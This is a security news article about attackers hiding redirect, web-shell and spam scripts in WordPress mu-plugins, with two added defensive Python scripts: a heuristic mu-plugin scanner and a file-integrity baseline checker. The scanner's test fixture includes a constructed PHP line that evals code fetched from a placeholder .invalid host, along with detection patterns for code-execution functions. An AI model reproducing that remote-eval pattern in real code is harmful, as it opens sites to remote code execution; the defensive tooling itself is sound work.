Hackers Target WordPress mu-Plugins to Hide Malware
Hackers are using WordPress’s mu-plugins to secretly plant malicious scripts on websites. These plugins, short for “must-use” plugins, run automatically without admin activation. Because of this, they don’t appear in the WordPress plugin dashboard, making them harder to spot during routine security checks.
According to a report, this method allows attackers to maintain long-term access. More importantly, it lets them redirect visitors to harmful websites and replace site images with explicit content.
What Are mu-Plugins and Why They Matter
Mu-plugins reside in the wp-content/mu-plugins folder. They’re designed to load automatically, even if not manually enabled. This convenience, however, also makes them attractive to threat actors.
Researchers found three types of harmful code placed in this folder:
- Redirect.php – sends visitors to a fake update page to download malware.
- Index.php – acts like a web shell, executing remote PHP code from outside sources.
- Custom-js-loader.php – injects spam, swaps all site images with graphic content, and hijacks links.
These scripts avoid detection by checking if the visitor is a bot. If so, the redirection or spam behavior is skipped. Therefore, search engines may never notice the issue.
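Because mu-plugins never show up in the plugin dashboard, the practical check is to inspect the folder on disk. The script below is an added example written for this page, not code from the report or from WordPress: it walks wp-content/mu-plugins, compares each file against an allowlist of files you expect to be there, and matches heuristic indicators for the behaviours described above (executing remotely fetched PHP, decoding hidden payloads, and gating a redirect on a bot user-agent check). The indicator patterns, the allowlist name, and the two fixture files it writes to a temporary folder are all constructed for the demonstration. WordPress auto-loads only top-level .php files in this folder, but a small loader can pull in files from subdirectories, so the walk is recursive.

```python
import re
import tempfile
from pathlib import Path

# Heuristic indicators (constructed for this example) for the behaviours the
# report attributes to the rogue mu-plugins: running remotely fetched PHP,
# executing request-supplied code, hiding payloads behind decoders, gating
# behaviour on bot user agents, and redirecting visitors.
INDICATORS = {
    "remote_code_exec": re.compile(
        r"\b(eval|create_function)\s*\(|"
        r"file_get_contents\s*\(\s*['\"]https?://|"
        r"\b(include|require)(_once)?\s*\(?\s*['\"]https?://",
        re.I,
    ),
    "request_to_exec": re.compile(
        r"\b(eval|system|passthru|shell_exec|exec)\s*\([^;]*\$_(GET|POST|REQUEST|COOKIE)",
        re.I,
    ),
    "obfuscation": re.compile(
        r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I
    ),
    "bot_check_gate": re.compile(
        r"HTTP_USER_AGENT.{0,200}?(bot|crawl|spider|slurp)", re.I | re.S
    ),
    "redirect": re.compile(r"header\s*\(\s*['\"]Location:|window\.location", re.I),
}


def scan_mu_plugins(mu_dir, allowlist=frozenset()):
    """Return {relative_path: {"expected": bool, "indicators": [...]}} for every
    .php file under mu_dir. The walk is recursive because a loader file can
    require_once code from a subdirectory that WordPress itself never lists."""
    root = Path(mu_dir)
    findings = {}
    for path in sorted(root.rglob("*.php")):
        rel = path.relative_to(root).as_posix()
        text = path.read_text(errors="replace")
        hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
        findings[rel] = {"expected": rel in allowlist, "indicators": hits}
    return findings


def suspicious(findings):
    """Files to review by hand: anything not on the allowlist, anything that
    executes remote or request-supplied code or decodes hidden payloads, and
    any file that combines a bot check with a redirect."""
    flagged = []
    for rel, f in findings.items():
        ind = set(f["indicators"])
        if (not f["expected"]
                or ind & {"remote_code_exec", "request_to_exec", "obfuscation"}
                or {"bot_check_gate", "redirect"} <= ind):
            flagged.append(rel)
    return flagged


# Constructed fixtures: a benign mu-plugin and a file that mimics the
# report's description (bot-gated redirect plus remote code fetch).
# Neither is a real sample; the hostnames are reserved .invalid names.
BENIGN = """<?php
/* Plugin Name: Site loader (constructed, benign) */
add_action('init', function () {
    remove_action('wp_head', 'wp_generator');
});
"""
ROGUE = """<?php
if (stripos($_SERVER['HTTP_USER_AGENT'], 'bot') === false) {
    header('Location: https://redirect.example.invalid/');
}
eval(file_get_contents('https://remote.example.invalid/code.txt'));
"""


def demo_scan():
    """Write the fixtures to a temporary mu-plugins folder and scan it."""
    mu_dir = Path(tempfile.mkdtemp()) / "mu-plugins"
    mu_dir.mkdir()
    (mu_dir / "site-loader.php").write_text(BENIGN)
    (mu_dir / "index.php").write_text(ROGUE)
    findings = scan_mu_plugins(mu_dir, allowlist={"site-loader.php"})
    return findings, suspicious(findings)


if __name__ == "__main__":
    findings, flagged = demo_scan()
    for rel, f in findings.items():
        status = "expected" if f["expected"] else "UNEXPECTED"
        print(rel, status, f["indicators"])
    print("review:", flagged)
```

On a real site, point scan_mu_plugins at the live wp-content/mu-plugins path and populate the allowlist from your own deployment records; the indicators are deliberately broad, so treat a hit as a reason to read the file, not as proof of compromise.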
Spam, Malware, and SEO Manipulation
The attacks don’t stop at redirection. Infected sites are used to trick visitors into running PowerShell commands disguised as CAPTCHA challenges. These lead to malware installations like Lumma Stealer.
Other attacks inject malicious JavaScript to steal data from checkout pages or redirect users to scam domains. Often, these infections spread through weak admin passwords, outdated themes, or vulnerable plugins.
Known Plugin Vulnerabilities Under Attack
Several known WordPress plugin flaws have been actively exploited this year, including:
- CVE-2024-27956 – Arbitrary SQL execution in WordPress Automatic Plugin.
- CVE-2024-25600 – Remote code execution via Bricks theme.
- CVE-2024-8353 – PHP object injection in GiveWP.
- CVE-2024-4345 – Arbitrary file upload via Startklar Elementor Addons.
These critical vulnerabilities give hackers full control of a site when left unpatched.
How to Prevent These Attacks
To stay safe, WordPress users must take proactive measures. First, keep all plugins and themes updated. Second, use strong passwords and enable two-factor authentication. Also, regularly scan your website files and database for unusual changes.
Most importantly, deploy a web application firewall (WAF) to filter out malicious requests. This adds an extra layer of defense and helps prevent code injection or backdoor access.
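Scanning files "for unusual changes" is only meaningful against a known-good baseline. The following added example (written for this page, not part of the report or of any WordPress tooling) records a SHA-256 digest of every PHP, JavaScript and .htaccess file under wp-content, stores it as JSON, and later diffs the live tree against it to list added, removed and modified files. The directory layout and file contents it creates in a temporary folder are constructed for the demonstration, and the baseline location is an assumption; in production the baseline should live outside the web root or on a separate host so an attacker with file-write access cannot rewrite it.

```python
import hashlib
import json
import tempfile
from pathlib import Path


def build_baseline(root, names=(".php", ".js", ".htaccess")):
    """Map each matching file under root (relative POSIX path) to its SHA-256 digest.
    '.htaccess' has no suffix in pathlib terms, so it is matched on the full name."""
    root = Path(root)
    baseline = {}
    for path in sorted(root.rglob("*")):
        if path.is_file() and (path.suffix in names or path.name in names):
            digest = hashlib.sha256(path.read_bytes()).hexdigest()
            baseline[path.relative_to(root).as_posix()] = digest
    return baseline


def save_baseline(baseline, out_file):
    Path(out_file).write_text(json.dumps(baseline, indent=2, sort_keys=True))


def load_baseline(in_file):
    return json.loads(Path(in_file).read_text())


def diff_baseline(old, new):
    """Compare two baselines and report what changed since the first was taken."""
    return {
        "added": sorted(set(new) - set(old)),
        "removed": sorted(set(old) - set(new)),
        "modified": sorted(p for p in set(old) & set(new) if old[p] != new[p]),
    }


def demo_integrity():
    """Constructed walk-through: take a baseline, simulate the kind of change
    the report describes (a new mu-plugin appears, an existing file is
    altered), then diff the live tree against the stored baseline."""
    site = Path(tempfile.mkdtemp())
    content = site / "wp-content"
    mu = content / "mu-plugins"
    mu.mkdir(parents=True)
    (content / "plugins").mkdir()
    (mu / "site-loader.php").write_text("<?php /* constructed benign mu-plugin */\n")

    # Assumed location; in practice keep this outside the web root.
    baseline_file = site / "baseline.json"
    save_baseline(build_baseline(content), baseline_file)

    # Simulated compromise: a new file using a name the report lists, and
    # a modification to the existing loader.
    (mu / "custom-js-loader.php").write_text("<?php /* constructed: unexpected new file */\n")
    (mu / "site-loader.php").write_text("<?php /* constructed: altered content */\n")

    return diff_baseline(load_baseline(baseline_file), build_baseline(content))


if __name__ == "__main__":
    for kind, paths in demo_integrity().items():
        print(f"{kind}: {paths}")
```

Run build_baseline immediately after a clean install or a verified update, re-run it from a scheduled job, and treat any entry under "added" or "modified" inside mu-plugins as something to inspect before the next release cycle, since legitimate changes there should only follow a deliberate deployment.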
Sleep well, we got you covered.